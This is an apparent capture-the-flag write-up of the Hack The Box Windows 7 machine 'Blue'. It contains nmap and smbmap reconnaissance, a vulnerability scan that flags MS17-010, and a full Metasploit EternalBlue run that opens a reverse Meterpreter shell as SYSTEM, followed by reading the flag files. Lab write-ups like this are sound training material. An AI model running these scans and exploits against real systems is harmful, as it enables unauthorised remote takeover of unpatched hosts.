Blue
Introduction:
Recon
1# nmap -sS -sV -sC -T4 -oN nmap.blue.txt 10.10.10.40
2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 20:24 EST
3Nmap scan report for 10.10.10.40
4Host is up (0.015s latency).
5Not shown: 991 closed ports
6PORT STATE SERVICE VERSION
7135/tcp open msrpc Microsoft Windows RPC
8139/tcp open netbios-ssn Microsoft Windows netbios-ssn
9445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
1049152/tcp open msrpc Microsoft Windows RPC
1149153/tcp open msrpc Microsoft Windows RPC
1249154/tcp open msrpc Microsoft Windows RPC
1349155/tcp open msrpc Microsoft Windows RPC
1449156/tcp open msrpc Microsoft Windows RPC
1549157/tcp open msrpc Microsoft Windows RPC
16Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
17
18Host script results:
19|_clock-skew: mean: 7m58s, deviation: 2s, median: 7m57s
20| smb-os-discovery:
21| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
22| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
23| Computer name: haris-PC
24| NetBIOS computer name: HARIS-PC\x00
25| Workgroup: WORKGROUP\x00
26|_ System time: 2020-12-22T01:33:43+00:00
27| smb-security-mode:
28| account_used: guest
29| authentication_level: user
30| challenge_response: supported
31|_ message_signing: disabled (dangerous, but default)
32| smb2-security-mode:
33| 2.02:
34|_ Message signing enabled but not required
35| smb2-time:
36| date: 2020-12-22T01:33:40
37|_ start_date: 2020-12-22T01:21:07
38
39Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
40Nmap done: 1 IP address (1 host up) scanned in 70.52 seconds
Notes:
- Blue is a windows machine running - Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
- Ports 139/145 are open which means SMB is running and as nmap reports - message signing is disabled
- SMB allows guest login
Enumeration
SMBMAP
1# smbmap -u guest -d x00 -H 10.10.10.40
2[+] IP: 10.10.10.40:445 Name: 10.10.10.40
3 Disk Permissions Comment
4 ---- ----------- -------
5 ADMIN$ NO ACCESS Remote Admin
6 C$ NO ACCESS Default share
7 IPC$ NO ACCESS Remote IPC
8 Share READ ONLY
9 Users READ ONLY
10
1nmap --script smb-vuln* -p 139,445 10.10.10.40
2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 20:47 EST
3Nmap scan report for 10.10.10.40
4Host is up (0.016s latency).
5
6PORT STATE SERVICE
7139/tcp open netbios-ssn
8445/tcp open microsoft-ds
9
10Host script results:
11|_smb-vuln-ms10-054: false
12|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
13| smb-vuln-ms17-010:
14| VULNERABLE:
15| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
16| State: VULNERABLE
17| IDs: CVE:CVE-2017-0143
18| Risk factor: HIGH
19| A critical remote code execution vulnerability exists in Microsoft SMBv1
20| servers (ms17-010).
21|
22| Disclosure date: 2017-03-14
23| References:
24| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
25| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
26|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
27
28Nmap done: 1 IP address (1 host up) scanned in 13.73 seconds
29
Exploitation
1msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
2
3[-] Handler failed to bind to 10.10.14.15:4444:- -
4[-] Handler failed to bind to 0.0.0.0:4444:- -
5[-] 10.10.10.40:445 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
6[*] Exploit completed, but no session was created.
7msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4455
8lport => 4455
9msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
10
11[*] Started reverse TCP handler on 10.10.14.15:4455
12[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
13[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
14[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
15[*] 10.10.10.40:445 - Connecting to target for exploitation.
16[+] 10.10.10.40:445 - Connection established for exploitation.
17[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
18[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
19[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
20[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
21[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
22[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
23[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
24[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
25[*] 10.10.10.40:445 - Starting non-paged pool grooming
26[+] 10.10.10.40:445 - Sending SMBv2 buffers
27[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
28[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
29[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
30[*] 10.10.10.40:445 - Receiving response from exploit packet
31[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
32[*] 10.10.10.40:445 - Sending egg to corrupted connection.
33[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
34[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
35[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
36[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
37[*] 10.10.10.40:445 - Connecting to target for exploitation.
38[+] 10.10.10.40:445 - Connection established for exploitation.
39[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
40[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
41[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
42[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
43[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
44[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
45[*] 10.10.10.40:445 - Trying exploit with 17 Groom Allocations.
46[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
47[*] 10.10.10.40:445 - Starting non-paged pool grooming
48[+] 10.10.10.40:445 - Sending SMBv2 buffers
49[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
50[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
51[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
52[*] 10.10.10.40:445 - Receiving response from exploit packet
53[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
54[*] 10.10.10.40:445 - Sending egg to corrupted connection.
55[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
56[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
57[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
58[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
59[*] 10.10.10.40:445 - Connecting to target for exploitation.
60[+] 10.10.10.40:445 - Connection established for exploitation.
61[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
62[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
63[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
64[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
65[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
66[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
67[*] 10.10.10.40:445 - Trying exploit with 22 Groom Allocations.
68[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
69[*] 10.10.10.40:445 - Starting non-paged pool grooming
70[+] 10.10.10.40:445 - Sending SMBv2 buffers
71[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
72[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
73[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
74[*] 10.10.10.40:445 - Receiving response from exploit packet
75[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
76[*] 10.10.10.40:445 - Sending egg to corrupted connection.
77[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
78[*] Sending stage (200262 bytes) to 10.10.10.40
79[*] Meterpreter session 1 opened (10.10.14.15:4455 -> 10.10.10.40:49158) at 2020-12-21 23:39:49 -0500
80[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
81[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
82[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
83
84meterpreter > ls
85Listing: C:\Windows\system32
86============================
87
1meterpreter > sysinfo
2Computer : HARIS-PC
3OS : Windows 7 (6.1 Build 7601, Service Pack 1).
4Architecture : x64
5System Language : en_GB
6Domain : WORKGROUP
7Logged On Users : 0
8Meterpreter : x64/windows
9meterpreter > getuid
10Server username: NT AUTHORITY\SYSTEM
11
Post-exploit/PrivEsc
1meterpreter > cd Desktop
2lmeterpreter > ls
3Listing: C:\Users\haris\Desktop
4===============================
5
6Mode Size Type Last modified Name
7---- ---- ---- ------------- ----
8100666/rw-rw-rw- 282 fil 2017-07-14 09:45:52 -0400 desktop.ini
9100666/rw-rw-rw- 32 fil 2017-07-21 02:54:02 -0400 user.txt
10
11meterpreter > cat user.txt
124cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXa9
13meterpreter > cd ../../Administrator
14meterpreter > ls
15Listing: C:\Users\Administrator
16===============================
17
18Mode Size Type Last modified Name
19---- ---- ---- ------------- ----
2040777/rwxrwxrwx 0 dir 2017-07-21 02:56:23 -0400 AppData
2140777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Application Data
2240555/r-xr-xr-x 0 dir 2017-07-21 02:56:28 -0400 Contacts
2340777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Cookies
2440555/r-xr-xr-x 0 dir 2017-07-21 02:56:23 -0400 Desktop
2540555/r-xr-xr-x 4096 dir 2017-07-21 02:56:23 -0400 Documents
2640555/r-xr-xr-x 0 dir 2017-07-21 02:56:23 -0400 Downloads
2740555/r-xr-xr-x 0 dir 2017-07-21 02:56:23 -0400 Favorites
2840555/r-xr-xr-x 0 dir 2017-07-21 02:56:23 -0400 Links
2940777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Local Settings
3040555/r-xr-xr-x 0 dir 2017-07-21 02:56:23 -0400 Music
3140777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 My Documents
32100666/rw-rw-rw- 786432 fil 2017-07-21 02:56:23 -0400 NTUSER.DAT
33100666/rw-rw-rw- 65536 fil 2017-07-21 02:56:24 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
34100666/rw-rw-rw- 524288 fil 2017-07-21 02:56:24 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
35100666/rw-rw-rw- 524288 fil 2017-07-21 02:56:24 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
3640777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 NetHood
3740555/r-xr-xr-x 0 dir 2017-07-21 02:56:23 -0400 Pictures
3840777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 PrintHood
3940777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Recent
4040555/r-xr-xr-x 0 dir 2017-07-21 02:56:23 -0400 Saved Games
4140555/r-xr-xr-x 0 dir 2017-07-21 02:56:36 -0400 Searches
4240777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 SendTo
4340777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Start Menu
4440777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Templates
4540555/r-xr-xr-x 0 dir 2017-07-21 02:56:23 -0400 Videos
46100666/rw-rw-rw- 262144 fil 2017-07-21 02:56:24 -0400 ntuser.dat.LOG1
47100666/rw-rw-rw- 0 fil 2017-07-21 02:56:24 -0400 ntuser.dat.LOG2
48100666/rw-rw-rw- 20 fil 2017-07-21 02:56:24 -0400 ntuser.ini
49
50meterpreter > cd Desktop
51lmeterpreter > ls
52Listing: C:\Users\Administrator\Desktop
53=======================================
54
55Mode Size Type Last modified Name
56---- ---- ---- ------------- ----
57100666/rw-rw-rw- 282 fil 2017-07-21 02:56:36 -0400 desktop.ini
58100444/r--r--r-- 32 fil 2017-07-21 02:56:49 -0400 root.txt
59
60meterpreter > cat root.txt
61ffXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXe717
62meterpreter >
63
Notes: